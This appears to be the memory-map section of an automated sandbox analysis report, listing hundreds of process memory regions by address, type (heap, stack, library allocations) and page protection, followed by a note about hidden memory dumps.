1932F5C3000
heap
page read and write
B61AFF7000
stack
page read and write
219EE3B0000
trusted library allocation
page read and write
1932EAC1000
heap
page read and write
1C8E5240000
heap
page read and write
1932EB16000
heap
page read and write
2F66000
heap
page read and write
7FF6BAC41000
unkown
page execute read
30FF000
stack
page read and write
219E8E8C000
heap
page read and write
2B6697E000
stack
page read and write
1932F59D000
heap
page read and write
219E95C0000
trusted library section
page readonly
B61B87E000
stack
page read and write
22998E89000
heap
page read and write
10D0000
trusted library allocation
page read and write
1932F402000
heap
page read and write
1A9D1264000
heap
page read and write
2F66000
heap
page read and write
1932F58B000
heap
page read and write
1932FA02000
heap
page read and write
1932F5B2000
heap
page read and write
7ABC4F7000
stack
page read and write
1932FA22000
heap
page read and write
1040000
unkown
page readonly
2A810F11000
heap
page read and write
2F1F000
stack
page read and write
25913A00000
heap
page read and write
1932F57F000
heap
page read and write
219E95A0000
trusted library section
page readonly
1932F58E000
heap
page read and write
219EE510000
remote allocation
page read and write
247B4F80000
trusted library allocation
page read and write
3140000
heap
page read and write
219EE3D4000
trusted library allocation
page read and write
247B5113000
heap
page read and write
C1D000
stack
page read and write
2A810F00000
heap
page read and write
31CE000
heap
page read and write
1932F57F000
heap
page read and write
25914AC0000
trusted library allocation
page read and write
1932F57A000
heap
page read and write
1932F5A3000
heap
page read and write
1932F58B000
heap
page read and write
219E8D10000
trusted library allocation
page read and write
1932F584000
heap
page read and write
219EE3F4000
trusted library allocation
page read and write
1932F578000
heap
page read and write
25913ED9000
heap
page read and write
1A9D1281000
heap
page read and write
1932F58E000
heap
page read and write
31C6000
heap
page read and write
43F23FC000
stack
page read and write
FDA90FC000
stack
page read and write
22998E60000
heap
page read and write
F20737F000
stack
page read and write
1932F581000
heap
page read and write
7FF6BAC49000
unkown
page readonly
C5D000
stack
page read and write
1932FA02000
heap
page read and write
34FE000
stack
page read and write
25913C58000
heap
page read and write
219E8E74000
heap
page read and write
1932F58E000
heap
page read and write
1932F58B000
heap
page read and write
31C7000
heap
page read and write
2A810EC0000
heap
page read and write
1932EA56000
heap
page read and write
1030000
unkown
page readonly
1932F2E0000
remote allocation
page read and write
2264497B000
heap
page read and write
D9A196B000
stack
page read and write
219EE702000
heap
page read and write
1932FA00000
heap
page read and write
219E8E79000
heap
page read and write
219EE4C0000
trusted library allocation
page read and write
7FF6BAC49000
unkown
page readonly
25913C60000
heap
page read and write
219EE3D0000
trusted library allocation
page read and write
1932F57F000
heap
page read and write
22644BE0000
heap
page read and write
1932F58B000
heap
page read and write
43F24FB000
stack
page read and write
3490000
heap
page read and write
247B5802000
trusted library allocation
page read and write
F2072FE000
stack
page read and write
1932F57F000
heap
page read and write
22998F02000
heap
page read and write
1932F5B8000
heap
page read and write
219EE70F000
heap
page read and write
B61BA7A000
stack
page read and write
219E9901000
trusted library allocation
page read and write
2036F03C000
heap
page read and write
2D8F000
stack
page read and write
2A810F22000
heap
page read and write
7FF6BAC40000
unkown
page readonly
219EE62C000
heap
page read and write
2036F052000
heap
page read and write
1932F57F000
heap
page read and write
7ABC77B000
stack
page read and write
1932F599000
heap
page read and write
1A9D1200000
heap
page read and write
219E8E91000
heap
page read and write
2F59000
heap
page read and write
7ABBD3C000
stack
page read and write
2036F013000
heap
page read and write
2F66000
heap
page read and write
30BE000
stack
page read and write
22644810000
remote allocation
page read and write
1932F57D000
heap
page read and write
C5C000
stack
page read and write
2036EF10000
trusted library allocation
page read and write
81D6CF7000
stack
page read and write
247B5040000
heap
page read and write
1932F58C000
heap
page read and write
D9A1CF9000
stack
page read and write
1932F57F000
heap
page read and write
2264496C000
heap
page read and write
2A810F45000
heap
page read and write
219E8E00000
heap
page read and write
1932E980000
heap
page read and write
1932F576000
heap
page read and write
1932F576000
heap
page read and write
A5FFB7E000
stack
page read and write
219EE60F000
heap
page read and write
7ABC2FA000
stack
page read and write
1932F581000
heap
page read and write
2036F081000
heap
page read and write
7FF6BAC4C000
unkown
page read and write
1932F55C000
heap
page read and write
1932F500000
heap
page read and write
2A810F30000
heap
page read and write
31C6000
heap
page read and write
1932EA70000
heap
page read and write
219E9600000
heap
page read and write
1932F57D000
heap
page read and write
2A810EC5000
heap
page read and write
1932F586000
heap
page read and write
22999802000
trusted library allocation
page read and write
2F5E000
heap
page read and write
CC0000
trusted library allocation
page read and write
1932EA53000
heap
page read and write
B61B47F000
stack
page read and write
1932E910000
heap
page read and write
2F59000
heap
page read and write
B61B77F000
stack
page read and write
1932F594000
heap
page read and write
1932EAE6000
heap
page read and write
1932F54C000
heap
page read and write
2A810F25000
heap
page read and write
7FF6BAC4C000
unkown
page write copy
1A9D125C000
heap
page read and write
22998F00000
heap
page read and write
1932F57F000
heap
page read and write
7ABC5FF000
stack
page read and write
2036EDA0000
heap
page read and write
1A9D1C02000
trusted library allocation
page read and write
247B5054000
heap
page read and write
1932F57F000
heap
page read and write
226447B0000
heap
page read and write
B61B0FC000
stack
page read and write
1932F572000
heap
page read and write
1932FA62000
heap
page read and write
1C8E6E80000
heap
page read and write
1932F5B0000
heap
page read and write
81D6A7C000
stack
page read and write
CC0000
remote allocation
page read and write
43F287E000
stack
page read and write
1A9D1229000
heap
page read and write
1A9D1300000
heap
page read and write
7FF6BAC4E000
unkown
page readonly
10CE000
stack
page read and write
1932F524000
heap
page read and write
219EE6E1000
heap
page read and write
B61B6FA000
stack
page read and write
22644950000
heap
page read and write
2A810F30000
heap
page read and write
1932EAFA000
heap
page read and write
FDA91FD000
stack
page read and write
219EE68B000
heap
page read and write
2E7C000
stack
page read and write
247B5000000
heap
page read and write
1932EAA9000
heap
page read and write
1932F599000
heap
page read and write
F20747F000
stack
page read and write
1C8E53A0000
heap
page read and write
323E000
stack
page read and write
1932EA3C000
heap
page read and write
1C8E5720000
heap
page read and write
2036EE10000
heap
page read and write
1932F57F000
heap
page read and write
31DF000
heap
page read and write
1932EA4C000
heap
page read and write
1932F57F000
heap
page read and write
B61BC7E000
stack
page read and write
219E8E6F000
heap
page read and write
1A9D11E0000
trusted library allocation
page read and write
D9A1D79000
stack
page read and write
1932F57D000
heap
page read and write
219EE3D1000
trusted library allocation
page read and write
1932F584000
heap
page read and write
1932F582000
heap
page read and write
2036EDB0000
heap
page read and write
1932EAEC000
heap
page read and write
1932F57D000
heap
page read and write
1932EB02000
heap
page read and write
1932F57E000
heap
page read and write
1932FA22000
heap
page read and write
1932F57D000
heap
page read and write
219EE510000
remote allocation
page read and write
922B76C000
stack
page read and write
43F277F000
stack
page read and write
1A9D1213000
heap
page read and write
219E8BA0000
heap
page read and write
30AF000
stack
page read and write
3540000
heap
page read and write
2F67000
heap
page read and write
219EE3E0000
trusted library allocation
page read and write
1932F584000
heap
page read and write
1932F58B000
heap
page read and write
1932EA4A000
heap
page read and write
2F5E000
heap
page read and write
247B5100000
heap
page read and write
A5FFA7C000
stack
page read and write
247B4E80000
heap
page read and write
1932FA02000
heap
page read and write
1932F59D000
heap
page read and write
219EE6A9000
heap
page read and write
2DC0000
heap
page read and write
22998E7F000
heap
page read and write
7FF6BAC4C000
unkown
page write copy
1932F59D000
heap
page read and write
22998E3C000
heap
page read and write
1A9D1259000
heap
page read and write
2036F050000
heap
page read and write
1932F57E000
heap
page read and write
1932F5B1000
heap
page read and write
7FF6BAC4E000
unkown
page readonly
1030000
unkown
page readonly
1932EAE9000
heap
page read and write
219EE480000
trusted library allocation
page read and write
219EE700000
heap
page read and write
1932F573000
heap
page read and write
219E8DE1000
trusted library allocation
page read and write
1932EB08000
heap
page read and write
2F6F000
heap
page read and write
219E8E3F000
heap
page read and write
1932F584000
heap
page read and write
2036F113000
heap
page read and write
32C9000
heap
page read and write
219EE600000
heap
page read and write
226448F0000
heap
page read and write
2EE0000
remote allocation
page read and write
1932F5A1000
heap
page read and write
1932F595000
heap
page read and write
2036F108000
heap
page read and write
2036F029000
heap
page read and write
1932F5B0000
heap
page read and write
1A9D125F000
heap
page read and write
1A9D123C000
heap
page read and write
2B66677000
stack
page read and write
81D6DFE000
stack
page read and write
31C6000
heap
page read and write
1932F590000
heap
page read and write
22998E66000
heap
page read and write
219E9615000
heap
page read and write
1932FA02000
heap
page read and write
7FF6BAC40000
unkown
page readonly
22998E53000
heap
page read and write
B61B1F9000
stack
page read and write
1932F57F000
heap
page read and write
1932F5A9000
heap
page read and write
219E9DE0000
trusted library allocation
page read and write
7ABC3F7000
stack
page read and write
1932F59D000
heap
page read and write
31D6000
heap
page read and write
7ABBDBE000
stack
page read and write
1932E9B0000
trusted library allocation
page read and write
2EBC000
stack
page read and write
219EE67E000
heap
page read and write
1932F569000
heap
page read and write
C80000
remote allocation
page read and write
2F50000
heap
page read and write
219EE510000
remote allocation
page read and write
D9A1DFF000
stack
page read and write
1932EAA8000
heap
page read and write
1932F5D6000
heap
page read and write
1932F572000
heap
page read and write
219E95B0000
trusted library section
page readonly
219EE510000
trusted library allocation
page read and write
1932F518000
heap
page read and write
1932EAE0000
heap
page read and write
1932F596000
heap
page read and write
B61B4FE000
stack
page read and write
2A810E80000
heap
page read and write
1932F596000
heap
page read and write
2F6F000
heap
page read and write
2F5E000
heap
page read and write
1932F5A7000
heap
page read and write
7FF6BAC41000
unkown
page execute read
25914B10000
trusted library allocation
page read and write
31D6000
heap
page read and write
1932F578000
heap
page read and write
1932F57F000
heap
page read and write
1932F599000
heap
page read and write
219EE3B0000
trusted library allocation
page read and write
1932F579000
heap
page read and write
F2074FF000
stack
page read and write
38A1000
trusted library allocation
page read and write
1932F57F000
heap
page read and write
219E8EA3000
heap
page read and write
1932F596000
heap
page read and write
219EE4E0000
trusted library allocation
page read and write
1932F59D000
heap
page read and write
1050000
unkown
page read and write
2F50000
heap
page read and write
1932F578000
heap
page read and write
1932F57F000
heap
page read and write
922BD7E000
stack
page read and write
1932F58B000
heap
page read and write
2A810F16000
heap
page read and write
219EE4D0000
trusted library allocation
page read and write
2A810F44000
heap
page read and write
219E8D20000
trusted library section
page read and write
1932F57D000
heap
page read and write
1932F58B000
heap
page read and write
2A810F0B000
heap
page read and write
25914890000
trusted library allocation
page read and write
2EDE000
stack
page read and write
FDA917E000
stack
page read and write
2F59000
heap
page read and write
1932FA02000
heap
page read and write
31DE000
heap
page read and write
1A9D1140000
heap
page read and write
7FF6BAC40000
unkown
page readonly
22998E29000
heap
page read and write
F20727A000
stack
page read and write
1932F59F000
heap
page read and write
1050000
unkown
page read and write
22998F13000
heap
page read and write
1932F57A000
heap
page read and write
219EE500000
trusted library allocation
page read and write
2F50000
heap
page read and write
There are 617 hidden memdumps, click here to show them.